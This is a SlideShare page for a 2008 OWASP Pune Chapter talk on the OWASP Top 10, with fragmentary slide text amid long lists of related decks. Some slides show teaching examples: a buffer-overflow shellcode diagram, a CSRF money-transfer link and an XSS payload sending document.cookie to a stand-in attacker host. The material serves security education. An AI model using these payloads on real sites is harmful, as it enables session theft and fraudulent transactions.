Enviar búsqueda
Cargar
Owasp Top 10 - Owasp Pune Chapter - January 2008
•
Descargar como PPT, PDF
•
2 recomendaciones
•
9,638 vistas
A
abhijitapatil
Seguir
Presentation at the OWASP Pune Chapter, Pune, India
Leer menos
Leer más
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 93
Descargar ahora
Recomendados
Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
Vaibhav Gupta
Web application security
Web application security
Kapil Sharma
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
Web Application Security 101
Web Application Security 101
Jannis Kirschner
Owasp top 10 security threats
Owasp top 10 security threats
Vishal Kumar
OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
Intro to Web Application Security
Intro to Web Application Security
Rob Ragan
Recomendados
Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
Vaibhav Gupta
Web application security
Web application security
Kapil Sharma
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
Web Application Security 101
Web Application Security 101
Jannis Kirschner
Owasp top 10 security threats
Owasp top 10 security threats
Vishal Kumar
OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
Intro to Web Application Security
Intro to Web Application Security
Rob Ragan
Web Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
Owasp top 10
Owasp top 10
Aravindharamanan S
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Security Innovation
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
Terrance Medina
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
Owasp first5 presentation
Owasp first5 presentation
Ashwini Paranjpe
Owasp top 10 2017
Owasp top 10 2017
ibrahimumer2
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
OWASP Delhi
Owasp 2017 oveview
Owasp 2017 oveview
Shreyas N
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed
Rashid Khatmey
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
Owasp top 10
Owasp top 10
YasserElsnbary
OWASP -Top 5 Jagjit
OWASP -Top 5 Jagjit
Jagjit Singh Brar
Testing Web Application Security
Testing Web Application Security
Ted Husted
Step by step guide for web application security testing
Step by step guide for web application security testing
Avyaan, Web Security Company in India
Finding things on the web with Yahoo! BOSS: IIT Delhi
Finding things on the web with Yahoo! BOSS: IIT Delhi
Saurabh Sahni
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
Saurabh Sahni
Más contenido relacionado
La actualidad más candente
Web Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
Owasp top 10
Owasp top 10
Aravindharamanan S
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Security Innovation
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
Terrance Medina
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
Owasp first5 presentation
Owasp first5 presentation
Ashwini Paranjpe
Owasp top 10 2017
Owasp top 10 2017
ibrahimumer2
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
OWASP Delhi
Owasp 2017 oveview
Owasp 2017 oveview
Shreyas N
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed
Rashid Khatmey
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
Owasp top 10
Owasp top 10
YasserElsnbary
OWASP -Top 5 Jagjit
OWASP -Top 5 Jagjit
Jagjit Singh Brar
Testing Web Application Security
Testing Web Application Security
Ted Husted
Step by step guide for web application security testing
Step by step guide for web application security testing
Avyaan, Web Security Company in India
La actualidad más candente
(20)
Web Application Security and Awareness
Web Application Security and Awareness
Owasp top 10
Owasp top 10
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Owasp first5 presentation
Owasp first5 presentation
Owasp top 10 2017
Owasp top 10 2017
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
Owasp 2017 oveview
Owasp 2017 oveview
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Owasp top 10
Owasp top 10
OWASP -Top 5 Jagjit
OWASP -Top 5 Jagjit
Testing Web Application Security
Testing Web Application Security
Step by step guide for web application security testing
Step by step guide for web application security testing
Destacado
Finding things on the web with Yahoo! BOSS: IIT Delhi
Finding things on the web with Yahoo! BOSS: IIT Delhi
Saurabh Sahni
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
Saurabh Sahni
Enabling Microservices @Orbitz - Velocity Conf 2015
Enabling Microservices @Orbitz - Velocity Conf 2015
Steve Hoffman
My Site Was Hacked!
My Site Was Hacked!
Didit Marketing
Hacking & everything you need to survice a hackday - Yahoo! Agency Hack Day N...
Hacking & everything you need to survice a hackday - Yahoo! Agency Hack Day N...
Saurabh Sahni
Hacking for Innovation - WPP, New York
Hacking for Innovation - WPP, New York
Saurabh Sahni
The Cost of Bad (And Clean) Data
The Cost of Bad (And Clean) Data
RingLead
The Worst Code
The Worst Code
Michele Titolo
Identity Management for Web Application Developers
Identity Management for Web Application Developers
Prabath Siriwardena
Connected Identity : The Role of the Identity Bus
Connected Identity : The Role of the Identity Bus
Prabath Siriwardena
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
OWASP top 10-2013
OWASP top 10-2013
tmd800
API Security Best Practices & Guidelines
API Security Best Practices & Guidelines
Prabath Siriwardena
AppSec And Microservices
AppSec And Microservices
Sam Newman
Advanced API Security
Advanced API Security
Prabath Siriwardena
AppSec & Microservices - Velocity 2016
AppSec & Microservices - Velocity 2016
Sam Newman
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
OpenCredo
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
Sean Chittenden
2013 OWASP Top 10
2013 OWASP Top 10
bilcorry
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Adrian Cockcroft
Destacado
(20)
Finding things on the web with Yahoo! BOSS: IIT Delhi
Finding things on the web with Yahoo! BOSS: IIT Delhi
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
YQL: Hacking on steroids - Yahoo! Open Hack Day 2012
Enabling Microservices @Orbitz - Velocity Conf 2015
Enabling Microservices @Orbitz - Velocity Conf 2015
My Site Was Hacked!
My Site Was Hacked!
Hacking & everything you need to survice a hackday - Yahoo! Agency Hack Day N...
Hacking & everything you need to survice a hackday - Yahoo! Agency Hack Day N...
Hacking for Innovation - WPP, New York
Hacking for Innovation - WPP, New York
The Cost of Bad (And Clean) Data
The Cost of Bad (And Clean) Data
The Worst Code
The Worst Code
Identity Management for Web Application Developers
Identity Management for Web Application Developers
Connected Identity : The Role of the Identity Bus
Connected Identity : The Role of the Identity Bus
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
OWASP top 10-2013
OWASP top 10-2013
API Security Best Practices & Guidelines
API Security Best Practices & Guidelines
AppSec And Microservices
AppSec And Microservices
Advanced API Security
Advanced API Security
AppSec & Microservices - Velocity 2016
AppSec & Microservices - Velocity 2016
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
2013 OWASP Top 10
2013 OWASP Top 10
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Similar a Owasp Top 10 - Owasp Pune Chapter - January 2008
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
04. xss and encoding
04. xss and encoding
Eoin Keary
Web Application Security
Web Application Security
Abdul Wahid
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
Owasp top 10 2013
Owasp top 10 2013
Edouard de Lansalut
Web application attacks
Web application attacks
hruth
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docx
smile790243
Hacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
Penetration Testing Basics
Penetration Testing Basics
Rick Wanner
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
Security Awareness
Security Awareness
Lucas Hendrich
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
4.Xss
4.Xss
phanleson
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio Web
andres1422
Javascript Security
Javascript Security
jgrahamc
WebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
OmprakashVerma56
Similar a Owasp Top 10 - Owasp Pune Chapter - January 2008
(20)
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
04. xss and encoding
04. xss and encoding
Web Application Security
Web Application Security
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
Owasp top 10 2013
Owasp top 10 2013
Web application attacks
Web application attacks
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docx
Hacking Client Side Insecurities
Hacking Client Side Insecurities
Penetration Testing Basics
Penetration Testing Basics
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Security Awareness
Security Awareness
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
4.Xss
4.Xss
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio Web
Javascript Security
Javascript Security
WebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
Último
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Rustici Software
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Juan lago vázquez
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Deepika Singh
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
Sandro Moreira
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Zilliz
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
Christopher Logan Kennedy
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
jfdjdjcjdnsjd
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
DianaGray10
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
WSO2
Último
(20)
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
Owasp Top 10 - Owasp Pune Chapter - January 2008
1.
Pune, India January
2008
2.
SANS @RISK December
2007 3 Dec 10 Dec 17 Dec 24 Dec 31 Dec Total Microsoft Products 2 3 12 0 2 19 Mac 2 2 2 4 0 10 Linux 10 5 8 11 0 34 Unix, Solaris, etc 5 3 3 4 1 16 Network Device 1 3 1 1 1 7 Others ( various ) 31 33 30 37 16 147 Web Applications 70 34 52 35 52 243
3.
4.
5.
6.
7.
8.
OWASP Top 10
2004
9.
10.
11.
12.
Buffer 1 Return
address Other data -------------- --------------
13.
-------------- -------------- 90909090
90909090 90909090 90909090 90909090 Return Address Filled Buffer with NOP’s and Shellcode Shellcode
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
<a href="http://googlified.com.googlepages.com/contactlist.htm">
24.
25.
www.bank.com Victim Attacker
Logging Request Auth Cookies Legitimate Requests Sends an email containing malicious href tag. Click Here Transfer Money <a href= http://www.bank.com/transfer.php?acc=attacker&amount=$10000 > 1 2 3 4 5 6 7
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
Reflected XSS BID
- 21534
38.
39.
40.
41.
www.bank.com Victim Attacker
Logging Request Auth Cookies Legitimate Requests Click Here Stolen Cookies 1 2 3 4 5 6 7 Sends malicious request <script>document. location=“http://attacker/steal_cookies.php?cookies=“+document. cookie</script>
42.
43.
44.
45.
46.
Injection Flaws
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
Insecure Direct Object
Reference
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
login.asp homepage.asp login.asp
homepage.asp logoff Client Server GET www.abc.com www.abc.com/login.asp POST username + password www.abc.com/homepage.asp
81.
login.asp authenticate.asp login.asp
Redirect request logoff homepage.asp homepage.asp Client Server GET www.abc.com www.abc.com/login.asp POST username + password Redirect : www.abc.com/homepage.asp GET www.abc.com/homepage.asp www.abc.com/homepage.asp
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
Descargar ahora